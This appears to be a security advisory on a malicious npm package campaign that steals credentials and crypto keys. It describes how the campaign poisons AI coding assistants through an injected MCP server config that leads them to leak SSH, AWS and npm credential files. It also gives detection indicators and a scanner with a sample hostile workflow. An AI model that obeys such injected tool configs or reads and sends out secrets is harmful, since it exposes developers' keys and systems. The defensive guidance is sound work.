TL;DR
- A cluster of typosquatted npm packages is harvesting crypto keys, API tokens, and CI/CD secrets — then propagating via stolen npm/GitHub identities.
- The campaign also targets AI coding assistants by injecting a malicious Model Context Protocol (MCP) server configuration designed to trick tools into leaking SSH/AWS/npm creds.
- If you build software: treat this as active compromise risk — remove the packages, rotate secrets, and audit CI/workflows and developer machines.
What Happened
Researchers reported an active supply-chain campaign (tracked as SANDWORM_MODE) using at least 19 malicious npm packages published under multiple aliases. The packages masquerade as legitimate developer utilities via typosquatting, run payloads at install/import time, and prioritize credential and crypto key theft.
A second stage — time-gated with ~48h+ jitter, but fast in CI — expands into deeper harvesting, propagation, and workflow poisoning.
~/.ssh/id_rsa, ~/.aws/credentials, ~/.npmrc, and .env — then handing that data to the attacker-controlled “tool.”
Why It Matters
Secrets Are the Blast Radius
This isn’t just “one dev box.” It’s tokens, CI variables, cloud credentials, and crypto material — everything that turns a local foothold into org-wide access.
CI Is an Amplification Layer
Weaponized GitHub Actions and workflow injection can exfiltrate secrets and backdoor repos at scale.
AI Tooling Becomes an Exfil Path
MCP-style integrations are powerful — and that makes them a high-leverage place to enforce policy and least privilege.
Time-Gated Payloads Evade Quick Scans
Delayed stage-2 execution means short-lived sandboxes may miss the worst behavior.
What to Do Now
Hunt & Remove
Search your org for the listed malicious packages (and close typos) in package.json, lockfiles, internal registries, and build logs.
Rotate and Revoke
npm tokens, GitHub PATs, CI secrets, cloud keys, SSH keys. Assume any exposed dev/CI secret is compromised.
Audit CI Workflows
Review .github/workflows/* for suspicious pull_request_target, toJSON(secrets), unexpected curl/wget, or new exfil steps.
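As an added illustration of that audit (this is not code from the advisory or the researchers), a small Python scanner that flags the three indicators named above in a workflow file, including curl/wget hidden inside multi-line `run: |` scripts; the sample workflow and its example.invalid URLs are constructed.

```python
import re

# Indicators the advisory tells you to look for in .github/workflows/*: a
# pull_request_target trigger, the whole secrets context being serialized,
# and curl/wget inside run steps (one-liners or `run: |` block scalars).
TRIGGER_RE = re.compile(r"\bpull_request_target\b")
SECRETS_DUMP_RE = re.compile(r"toJSON\(\s*secrets\s*\)", re.IGNORECASE)
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
RUN_RE = re.compile(r"^(\s*)-?\s*run:\s*(.*)$")


def audit_workflow(text: str) -> list[tuple[int, str]]:
    """Return (line_number, reason) for every suspicious line in one workflow file."""
    findings = []
    run_indent = None  # indentation of the `run: |` line while inside its block
    for lineno, line in enumerate(text.splitlines(), 1):
        indent = len(line) - len(line.lstrip(" "))
        if run_indent is not None and line.strip() and indent <= run_indent:
            run_indent = None  # indentation dropped back: block scalar has ended
        if TRIGGER_RE.search(line):
            findings.append((lineno, "pull_request_target trigger"))
        if SECRETS_DUMP_RE.search(line):
            findings.append((lineno, "entire secrets context serialized"))
        m = RUN_RE.match(line)
        if m and m.group(2).strip() in ("|", "|-", ">", ">-"):
            run_indent = len(m.group(1))  # multi-line script starts here
        if (m or run_indent is not None) and DOWNLOADER_RE.search(line):
            findings.append((lineno, "curl/wget in run step"))
    return findings


# Constructed sample workflow (not from the advisory) showing all three indicators.
SAMPLE_WORKFLOW = """\
name: build
on:
  pull_request_target:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: debug
        run: echo '${{ toJSON(secrets) }}' | base64
      - name: postinstall
        run: |
          curl -fsSL https://example.invalid/setup.sh -o /tmp/setup.sh
          wget -q https://example.invalid/tool.tar.gz
      - name: test
        run: npm test
"""
if __name__ == "__main__":
    for lineno, reason in audit_workflow(SAMPLE_WORKFLOW):
        print(f"sample.yml:{lineno}: {reason}")
```

Run it over each file in `.github/workflows/` and treat every hit as a review item, not an automatic verdict: `pull_request_target` is legitimate in some workflows, but never together with a checkout of the PR head and access to secrets.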
Inspect Developer Endpoints
Check for persistence via git hooks and unusual global git config (e.g., init.templateDir).
Lock Down Egress
Where feasible, restrict build runners and dev environments to approved destinations. Alert on DNS tunneling patterns.
Add Dependency Controls
Enforce verified publishers, dependency allowlists, and automated SCA/SBOM checks. Block new/unknown packages by default for high-trust repos.
Constrain AI Tool Integrations
Treat MCP/tooling configs as sensitive. Require approval for new “tools,” pin tool servers, and prevent assistants from reading secrets by default.
Detect Unusual Token Use
Monitor for new GitHub API activity, repo modifications, package publishes, and odd auth patterns from dev/CI identities.
How This Maps to ABAC-Enabled Security
Policy-as-Code Authorization (ABAC)
Define explicit policies for who/what (developer workstation, CI runner, AI assistant) can access which secret classes (SSH keys, cloud creds, signing keys) and under what context (branch, repo, environment).
Data-Centric Controls
Treat secrets and credentials as high-value data. Apply classification + controls at the point of use (read, export, transmit), not just perimeter defenses.
Crypto Agility Mindset
Rotate keys/tokens quickly, prefer short-lived credentials, and automate key lifecycle so “rotate everything” is operationally survivable when supply-chain events hit.
Sources
- The Hacker News, “Malicious npm Packages Harvest Crypto” (February 2026)
- Socket Research, “SANDWORM_MODE: npm Worm & AI Toolchain Poisoning” (2026)